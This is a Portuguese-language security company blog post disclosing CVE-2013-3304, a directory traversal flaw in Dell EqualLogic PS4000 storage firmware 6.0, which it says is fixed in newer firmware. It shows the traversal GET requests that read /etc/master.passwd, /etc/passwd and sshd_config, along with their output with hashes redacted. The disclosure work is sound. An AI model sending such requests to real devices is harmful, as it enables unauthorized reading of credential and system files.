CVE-2013-3304 Dell EqualLogic Directory Traversal

Dell-EqualLogic-PS4000

A seguir, iremos demonstrar a falha em sistemas de Storages Equalogic descoberta por nossa empresa e reportada a empresa Dell, segundo informações da Dell esta falha foi consertada em uma nova versão de firmware.

Descrição da plataforma segundo o fabricante

Produtos EqualLogic são sistemas baseados em iSCSI Storage Area Network (SAN) comercializados pela Dell.

Interface web do Storage

Dell-EqualLogic_index

 

A falha de segurança

# Software: Dell EqualLogic
# Versão: 6.0
# Empresa: Dell Computers
# Website: www.dell.com
# Vulnerabilidade: Directory Traversal
# CVE: CVE-2013-3304
# Autor: Mauricio Corrêa

## Informações Adicionais ##
Modelo do Equipamento Testado: Dell EqualLogic PS4000
http://www.dell.com/br/empresa/p/equallogic-ps4000e/pd
Firmware Version: 6.0
#########################################################################

O usuário malicioso envia requisições mal formadas para acessar arquivos sensíveis dentro do sistema operacional do Hardware, possibilitando a quebra da segurança do NAS Storage.

GET //../../../../../../../../etc/master.passwd

root:[hash] &:/root:/bin/sh
daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin
operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*:[hash]:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:[hash]:Group Authenication Account:/:/sbin/nologin

 

GET //../../../../../../../../etc/passwd

root:*:[hash]:Charlie &:/root:/bin/sh
daemon:*:[hash]:The devil himself:/:/sbin/nologin
operator:*:[hash]:System &:/usr/guest/operator:/sbin/nologin
bin:*::Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*[hash]:1:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:*:[hash]Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:*:[hash]0:Group Authenication Account:/:/sbin/nologin

 

Como foi possível perceber, a falha é grave porém não é crítica, ainda não sabemos a extensão da falha pois o escopo foi limitado nestes testes, nota-se que arquivos de configurações de todo o sistema podem ser lidos.

Directory_TraversalJPG2

 

 

O sistema em si trata-se de um NetBSD podendo ser constatado lendo o arquivo de configuração do SSHD:

GET //../../../../../../../../etc/ssh/sshd_config HTTP/1.1

# $NetBSD: sshd_config,v 1.16 2002/10/01 14:07:47 itojun Exp $

 

A falha foi corrigida na nova versão dos firmwares da linha Equalogic da Dell.



Gostou do artigo? Compartilhe.

Share on linkedin
LinkedIn
Share on facebook
Facebook
Share on whatsapp
WhatsApp
Quer proteger seu website e seus dados na web?
Clique e saiba mais
Economize até 25% em TI
Diminua seus custos com infraestrutura em TI, e garanta buscas de falhas de segurança.
Clique e saiba mais
Antecipe falhas de segurança
Teste seus ativos com uma solução altamente confiável.
Clique e saiba mais
Previous
Next

Pesquisar no Blog

Faça parte da nossa lista de emails